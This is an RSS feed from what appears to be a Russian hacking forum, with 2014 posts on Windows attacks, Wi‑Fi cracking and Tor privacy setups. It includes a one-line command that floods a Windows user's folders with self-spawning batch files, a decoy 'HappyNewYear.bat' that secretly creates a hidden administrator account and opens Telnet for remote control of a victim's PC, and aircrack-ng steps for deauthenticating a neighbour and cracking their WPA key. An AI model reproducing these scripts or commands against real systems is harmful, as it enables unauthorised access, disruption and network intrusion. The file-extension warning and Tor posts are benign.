			<title>Пуск &gt; Выполнить</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=31#p31</link>
			<description>&lt;p&gt;Пуск &amp;gt; Выполнить&lt;br /&gt;cmd.exe /k cd %userprofile%&amp;amp;echo start cmd.exe /k %0&amp;gt;e.bat&amp;amp;echo start cmd.exe /k %0&amp;gt;&amp;gt;e.bat&amp;amp;for /d /r &amp;quot;%userprofile%&amp;quot; %x in (*) do @copy e.bat &amp;quot;%x&amp;quot;&amp;amp;start cmd.exe /k e.bat&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Пуск &gt; Выполнить)</author>
			<pubDate>Thu, 13 Nov 2014 20:52:50 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=31#p31</guid>
		</item>
		<item>
			<title>Скрытое управление Windows через Telnet</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=19#p19</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Скрытое управление Windows через Telnet&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Создаём батник HappyNewYear.bat и запускаем его на компьютере &amp;quot;поциента&amp;quot;.&lt;/p&gt;
						&lt;p&gt;HappyNewYear.bat&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;@echo off
echo Please wait...
start iexplore http://se.uploads.ru/8bOTq.gif

chcp 1251 &amp;gt; nul 2&amp;gt; nul


echo Windows Registry Editor Version 5.00 &amp;gt; conf.reg
echo.  &amp;gt;&amp;gt; conf.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]  &amp;gt;&amp;gt; conf.reg
echo &amp;quot;vasya&amp;quot;=&amp;quot;dword:00000000&amp;quot;  &amp;gt;&amp;gt; conf.reg
echo.  &amp;gt;&amp;gt; conf.reg


net user SUPPORT_388945a0 /delete  &amp;gt; nul 2&amp;gt; nul
net user vasya pass123456789 /add  &amp;gt; nul 2&amp;gt; nul
net localgroup Администраторы vasya /add  &amp;gt; nul 2&amp;gt; nul
net localgroup Пользователи SUPPORT_388945a0 /del  &amp;gt; nul 2&amp;gt; nul
regedit /s conf.reg  &amp;gt; nul 2&amp;gt; nul
sc config tlntsvr start= auto  &amp;gt; nul 2&amp;gt; nul
tlntadmn config port=972 sec=-NTLM  &amp;gt; nul 2&amp;gt; nul
net start Telnet  &amp;gt; nul 2&amp;gt; nul

del conf.reg &amp;gt; nul 2&amp;gt; nul&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Этот батник делает две вещи:&lt;br /&gt;1. Создает администратора vasya с паролем pass123456789 &lt;br /&gt;2. Включает службу telnet и вешает её на 927 порт.&lt;/p&gt;
						&lt;p&gt;Осталось подключится:&lt;br /&gt;1. В консоли запускаем telnet.&lt;br /&gt;2. В телнете набираем команду open IPпоциента 927.&lt;br /&gt;3. Если пишет: Welcome to Microsoft Telnet Service login:_ то всё OK)) Вводим: login: vasya password: pass123456789&lt;br /&gt;4. Если система не ругнулась, то поздравляю - ты внутри, перед тобой консоль, с помощью которой ты можешь удаленно управлять ПК, отдавая команды. &lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://i64.fastpic.ru/big/2014/0919/c1/a38775ad074980b621e335610750a8c1.gif&quot; alt=&quot;http://i64.fastpic.ru/big/2014/0919/c1/a38775ad074980b621e335610750a8c1.gif&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://se.uploads.ru/8bOTq.gif&quot; alt=&quot;http://se.uploads.ru/8bOTq.gif&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Thu, 16 Oct 2014 22:12:43 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=19#p19</guid>
		</item>
		<item>
			<title>Windows. Каких расширений файлов следует опасаться?</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Windows. Каких расширений файлов следует опасаться?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Теоретически, исправная антивирусная программа со свежими базами может в значительной мере обезопасить вашу работу. Но любой, даже самый совершенный антивирус может ошибиться или не успеть внести заразу в свои фильтры. Поэтому дополнительным фактором защиты лучше включать свою голову вооруженную необходимыми знаниями.&lt;/p&gt;
						&lt;p&gt;Если вы получили файл из подозрительного источника, например по почте от незнакомого человека, то необходимо обратить внимание на его расширение и, если оно входит в предложенный нами список, то лучше его не открывать, а отослать на проверку в VirusTotal.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Программы&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; .EXE - исполнимый программный файл. Большинство программ в Windows имеют именно такое расширение.&lt;br /&gt;&amp;#160; &amp;#160; .PIF – это специальный файл, содержащий информацию для DOS-программ. Несмотря на то, что не содержат исполнимого кода, могут быть потенциально опасны.&lt;br /&gt;&amp;#160; &amp;#160; .APPLICATION – установщик приложения, использующий технологию ClickOnce от Microsoft.&lt;br /&gt;&amp;#160; &amp;#160; .GADGET – гаджет для отображения на&amp;#160; рабочем столе&amp;#160; в Windows Vista и 7.&lt;br /&gt;&amp;#160; &amp;#160; .MSI – запускает процесс установки программы на вашем компьютере.&lt;br /&gt;&amp;#160; &amp;#160; .MSP - установка обновлений для уже установленных программ.&lt;br /&gt;&amp;#160; &amp;#160; .COM – программы для MS-DOS.&lt;br /&gt;&amp;#160; &amp;#160; .SCR – файл скринсейвера.&lt;br /&gt;&amp;#160; &amp;#160; .HTA – веб-приложение. В отличие от html приложений исполняемых в вашем браузере, могут быть опасны.&lt;br /&gt;&amp;#160; &amp;#160; .CPL – файл Панели управления. Все элементы в панели управления имеют это расширение.&lt;br /&gt;&amp;#160; &amp;#160; .MSC – файл консоли управления Microsoft. Такие приложения, как редактор групповых политик и инструмент управления дисками имеют расширение .MSC.&lt;br /&gt;&amp;#160; &amp;#160; .JAR – исполнимый код для среды Java.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Скрипты&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; .BAT – пакетный файл, содержащий последовательность команд для вашего компьютера. Изначально использовался в MS-DOS.&lt;br /&gt;&amp;#160; &amp;#160; .CMD – пакетный файл наподобие .BAT, но это расширение файла было введено в Windows NT&lt;br /&gt;&amp;#160; &amp;#160; .VB, .VBS, .VBE&amp;#160; – файл VBScript. Будет при запуске выполнять свой VBScript код.&lt;br /&gt;&amp;#160; &amp;#160; .JS, .JSE - файл JavaScript. При использовании на веб-страницах является относительно безопасными, если работать в веб-браузере. Тем не менее, Windows может открывать эти файлы вне браузера и это несет угрозу.&lt;br /&gt;&amp;#160; &amp;#160; .WS, .WSF, .WSC, .WSH – файлы Windows Script.&lt;br /&gt;&amp;#160; &amp;#160; .PS1, .PS1XML, .PS2, .PS2XML, .PSC1, .PSC2 – командный сценарий для Windows PowerShell.&lt;br /&gt;&amp;#160; &amp;#160; .MSH, .MSH1, .MSH2, .MSHXML, .MSH1XML, .MSH2XML – командный сценарий для Monad. Monad позже был переименован в PowerShell.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Ярлыки&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; .SCF – командный файл Windows Explorer. Может содержать потенциально опасные команды.&lt;br /&gt;&amp;#160; &amp;#160; .LNK – ссылка для запуска программы. Может содержать атрибуты командной строки, которые делают опасные вещи, такие как удаление файлов без спроса.&lt;br /&gt;&amp;#160; &amp;#160; .INF – текстовый файл, используемый для автоматического запуска с подключаемых носителей. Часто используется для заражения с флешек или дисков.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Остальные&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; .REG - файл реестра Windows. Эти файлы содержат список записей реестра, которые будут добавлены или удалены, если вы запустите их. Опасность заключается в том, что вы можете удалить важные сведения из реестра, внести в него нежелательные или вредоносные данные.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Офисные макросы&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; .DOC, .XLS, .PPT – документы Microsoft Word, Excel, PowerPoint. Они могут содержать вредоносный программный код макроса.&lt;br /&gt;&amp;#160; &amp;#160; .DOCM, .DOTM, .XLSM, .XLTM, .XLAM, .PPTM, .POTM, .PPAM, .PPSM, .SLDM - новые расширения офисных файлов, введенные в Office 2007. “M” в конце расширение указывает, что документ содержит макросы. Например, .DOCX файл не содержит макросов, в то время как файл .DOCM может содержать макросы.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;И это все мне надо запомнить?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Вообще желательно. Но можно распечатать и повесить на видном месте. Или сохранить ссылку и обращаться по мере необходимости. И не забудьте поделиться этой информацией со всеми своими бабушками, дедушками, девушками и другими начинающими пользователями, которые могут этого не знать.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Thu, 16 Oct 2014 21:50:19 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>Тестирование WiFi сетей с помощью пакета aircrack-ng</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;На практике был использованы утилиты из дистрибутива Kali Linux&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Итак, картина маслом:&lt;/p&gt;
						&lt;p&gt;74:DE:2B:77:19:4D - я.&lt;br /&gt;18:F4:6A:9B:BF:59 - сосед.&lt;br /&gt;C8:64:C7:53:02:0C - нужная нам точка доступа (роутер). &lt;br /&gt;Роутер работает на 5 канале. Шифрование WPA/WPA2. Отображаемое имя DIR-300 &lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Запускаем беспроводной интерфейс в режиме мониторинга&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;airmon-ng start wlan0&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Слушаем (мониторим) эфир&lt;/span&gt; &lt;/p&gt;
						&lt;p&gt;Предварительная разведка&lt;br /&gt;airodump-ng mon0&lt;br /&gt;Останавливаем мониторинг клавишами Ctrl+C&lt;/p&gt;
						&lt;p&gt;Слушаем пакеты только для конкретной точки доступа&lt;br /&gt;airodump-ng --bssid C8:64:C7:53:02:0C mon0&lt;/p&gt;
						&lt;p&gt;Начинаем запись (дампинг) пакетов в файлы packets*&lt;br /&gt;airodump-ng -w packets -c 5 mon0&lt;/p&gt;
						&lt;p&gt;Или лучше вести выборочную запись &lt;br /&gt;airodump-ng --bssid C8:64:C7:53:02:0C -w packets -c 5 mon0&lt;br /&gt;Здесь&lt;br /&gt;--bssid C8:64:C7:53:02:0C точка доступа&lt;br /&gt;-c 5 номер канала&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Деаутентифицируем соседа&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Не останавливая записи пакетов, открываем новую консоль и создаём помехи соседу.&lt;br /&gt;aireplay-ng -0 1000 -a C8:64:C7:53:02:0C -c 18:F4:6A:9B:BF:59 --ignore-negative-one mon0&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Подбираем PSK ключ по словарю&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Брутим полученные даные packets-01.cap с помощью словаря passwords.txt&lt;br /&gt;aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets-01.cap&lt;/p&gt;
						&lt;p&gt;Если было проведено несколько попыток записи, то можно анализировать группу файлов&lt;br /&gt;aircrack-ng -a 2 -e DIR-300 -w passwords.txt packets*.cap&lt;/p&gt;
						&lt;p&gt;Здесь passwords.txt - текстовый файл, в каждой строке которого записан один пароль. Можно создать собственный словарь или скачать из Интернета.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Tue, 30 Sep 2014 15:11:24 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>Тонкая настройка Tor</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;p&gt;Наиболее изощренные любители запутанных соединений могут добавить в файл torrc параметр&lt;/p&gt;
						&lt;p&gt;HTTPSProxy адрес:порт&lt;/p&gt;
						&lt;p&gt;Такая настройка позволяет работать TOR-серверу через какой-нибудь прокси. Не знаю зачем, но возможно кому-то пригодится.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Sun, 24 Aug 2014 15:42:45 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=15#p15</guid>
		</item>
		<item>
			<title>Эдвард Сноуден используeт Linux-дистрибутив Tails</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=7#p7</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Эдвард Сноуден используeт Linux-дистрибутив Tails&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Эдвард Сноуден известный своими разоблачениям злодеяний ЦРУ и АНБ, дал интервью журналу Wired, из которого стало известно что Эдвард Сноуден использует специализированный Linux-дистрибутив Tails (The Amnesic Incognito Live System), что-бы обезопасить себя в Интернет пространстве от слежки со стороны его бывших сотрудников в АНБ. Дистрибутив Tails основан на системе Debian и работает как Live-дистрибутив, позволяющей обеспечить максимальный уровень анонимности и безопасности.&lt;/p&gt;
						&lt;p&gt;Анонимность он-лайн обеспечивает ему сеть Tor, все исходящие и входящие соединения, кроме трафика через сеть Tor, по умолчанию блокируются файрволлом. Для хранения данных между запусками применяется шифрование с использованием TrueCrypt. Так же, в дистрибутиве есть защита данных от холодной перезагрузки (сохранение данных в оперативной памяти после выключения компьютера с последующим их восстановлением), при вытаскивании носителя (флешки или диска), вся оперативная память очищается.&lt;/p&gt;
						&lt;p&gt;Кстати сам дистрибутив разрабатывается группой анонимных разработчиков, как и программа для шифрования TrueCrypt, как утверждают сами разработчики, они не раскрывают свои личности, дабы избежать давления со стороны спецслужб и чиновников, вспоминаем историю с Lavabit, который был закрыт по требованию властей.&lt;/p&gt;
						&lt;p&gt;Официальная страница проекта: tails.boum.org&lt;/p&gt;
						&lt;p&gt;Кстати я протестировал дистрибутив в условиях виртуальной машины. Впечатление самое приятное, никаких лагов или багов я не заметил, грузится быстро, работает стабильно. Советую попробовать всем, кто страдает параноей.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Sun, 17 Aug 2014 12:37:45 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=7#p7</guid>
		</item>
		<item>
			<title>Ubuntu, Tor, Vidalia, privoxy. Анонимность в сети</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Рубим всё, что не TOR&lt;/span&gt;&lt;br /&gt;Источник: &lt;a href=&quot;http://habrahabr.ru/post/143516/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://habrahabr.ru/post/143516/&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;И теперь — самое вкусное: рубим доступ в сеть всему, что не TOR и не I2P. Ещё раз — всему.&lt;br /&gt;Вот готовый скрипт iptables-restore, только проверьте ещё раз имена пользователей.&lt;/p&gt;
						&lt;p&gt;nano /etc/iptables.up.rules&lt;/p&gt;
						&lt;p&gt;Содержимое:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 13.5em&quot;&gt;&lt;pre&gt;*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A OUTPUT -d 127.0.0.1/32 -j ACCEPT
-A OUTPUT -m owner --uid-owner debian-tor -j ACCEPT
COMMIT&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Откроем файл настройки сети:&lt;br /&gt;nano /etc/network/interfaces&lt;/p&gt;
						&lt;p&gt;Допишем команду загрузки правил:&lt;br /&gt;pre-up iptables-restore &amp;lt; /etc/iptables.up.rules&lt;/p&gt;
						&lt;p&gt;У меня выглядит так:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;auto lo
iface lo inet loopback
pre-up iptables-restore &amp;lt; /etc/iptables.up.rules&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Поскольку управление сетью у меня идёт посредством network-manager — интерфейса eth0 в файле нет. Правила прописываются при поднятии лупбэка, но разницы нет, поскольку эти правила едины для всех интерфейсов.&lt;/p&gt;
						&lt;p&gt;Загрузим правила в iptables. Можно перезапустить сеть, но мы сделаем так:&lt;br /&gt;sudo iptables-restore &amp;lt; /etc/iptables.up.rules&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Sun, 17 Aug 2014 12:35:09 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>TOR-proxy для локальной сети. Настройка защищённого выхода в Интернет</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;TOR-proxy для локальной сети. Настройка защищённого выхода в Интернет для локалки&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Сегодня рассмотрим простое решение, как организовать секьюрный выход в интернет из локальной сети. При такой организации сети вся работа с интернетом будет проходить только через TOR.&lt;/p&gt;
						&lt;p&gt;Нам потребуется:&lt;br /&gt;1. Компьютер с двумя сетевыми интерфейсами, который мы настроим как прокси-сервер.&lt;br /&gt;2. Любой простейший роутер.&lt;/p&gt;
						&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://sd.uploads.ru/zvTMj.png&quot; alt=&quot;http://sd.uploads.ru/zvTMj.png&quot; /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Настройка прокси-сервера&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Устанавливаем на серверный комп операционную систему Linux. Я в своих экспериментах использовал Debian 7. В принципе можно использовать и другие линуксы.&lt;/p&gt;
						&lt;p&gt;Далее проводим настройку сервера с правами root.&lt;/p&gt;
						&lt;p&gt;Открываем файл /etc/apt/sources.list например так:&lt;/p&gt;
						&lt;p&gt;nano /etc/apt/sources.list&lt;/p&gt;
						&lt;p&gt;и добавляем строку:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;deb http://deb.torproject.org/torproject.org wheezy main&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Получаем ключи, обновляем список ПО, установливаем Tor, Vidalia, Privoxy, для чего в терминале выполняем последовательно:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 9em&quot;&gt;&lt;pre&gt;gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
apt-get update
apt-get install privoxy vidalia deb.torproject.org-keyring&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;При установке пакета Vidalia будет задан вопрос какого пользователя добавить в группу debian-tor. Я обычно никого не добавляю.&lt;/p&gt;
						&lt;p&gt;Удаляем текущий конфиг Privoxy:&lt;/p&gt;
						&lt;p&gt;rm /etc/privoxy/config&lt;/p&gt;
						&lt;p&gt;Создаем необходимый для работы с tor конфиг privoxy:&lt;/p&gt;
						&lt;p&gt;nano /etc/privoxy/config&lt;/p&gt;
						&lt;p&gt;вставляем:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 27em&quot;&gt;&lt;pre&gt;forward-socks4a / 127.0.0.1:9050 .
confdir /etc/privoxy
logdir /var/log/privoxy
actionsfile default.action
actionsfile user.action
filterfile default.filter
logfile logfile
debug 4096
debug 8192
user-manual /usr/share/doc/privoxy/user-manual
listen-address 192.168.6.1:3128
toggle 1
enable-remote-toggle 0
enable-edit-actions 0
enable-remote-http-toggle 0
buffer-limit 4096&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Настраиваем систему для работы с TOR-прокси&lt;/p&gt;
						&lt;p&gt;nano /etc/apt/apt.conf&lt;/p&gt;
						&lt;p&gt;добавляем:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;Acquire::http::proxy &amp;quot;http://192.168.6.1:3128/&amp;quot;;
Acquire::https::proxy &amp;quot;https://192.168.6.1:3128/&amp;quot;;
Acquire::ftp::proxy &amp;quot;ftp://192.168.6.1:3128/&amp;quot;;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;nano /etc/environment&lt;/p&gt;
						&lt;p&gt;добавляем:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;http_proxy=&amp;quot;http://192.168.6.1:3128/&amp;quot;
https_proxy=&amp;quot;https://192.168.6.1:3128/&amp;quot;
ftp_proxy=&amp;quot;ftp://192.168.6.1:3128/&amp;quot;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Рубим всё, что не TOR.&lt;/p&gt;
						&lt;p&gt;nano /etc/iptables.up.rules&lt;/p&gt;
						&lt;p&gt;Содержимое:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 15em&quot;&gt;&lt;pre&gt;*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A OUTPUT -d 127.0.0.1/32 -j ACCEPT
-A OUTPUT -d 192.168.6.1/24 -j ACCEPT
-A OUTPUT -m owner --uid-owner debian-tor -j ACCEPT
COMMIT&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Откроем файл настройки сети:&lt;br /&gt;nano /etc/network/interfaces&lt;/p&gt;
						&lt;p&gt;Допишем команду загрузки правил:&lt;br /&gt;pre-up iptables-restore &amp;lt; /etc/iptables.up.rules&lt;/p&gt;
						&lt;p&gt;У меня выглядит так:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 21em&quot;&gt;&lt;pre&gt;auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp
#hwaddress ether 77:88:99:aa:bb:cc

auto eth1
iface eth1 inet static
address 192.168.6.1
netmask 255.255.255.0
pre-up iptables-restore &amp;lt; /etc/iptables.up.rules&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Можно перезагрузить сервер&lt;/p&gt;
						&lt;p&gt;reboot&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Настройка роутера&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;В настройках роутера указываем внешний IP 192.168.6.2&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Настройка компьютеров локальной сети&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Выход в интернет компьютеры локальной сети имеют через прокси 192.168.6.1:3128. Именно такие адрес 192.168.6.1 и порт 3128 нужно указать в настройках прокси.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Sun, 17 Aug 2014 12:31:35 +0400</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
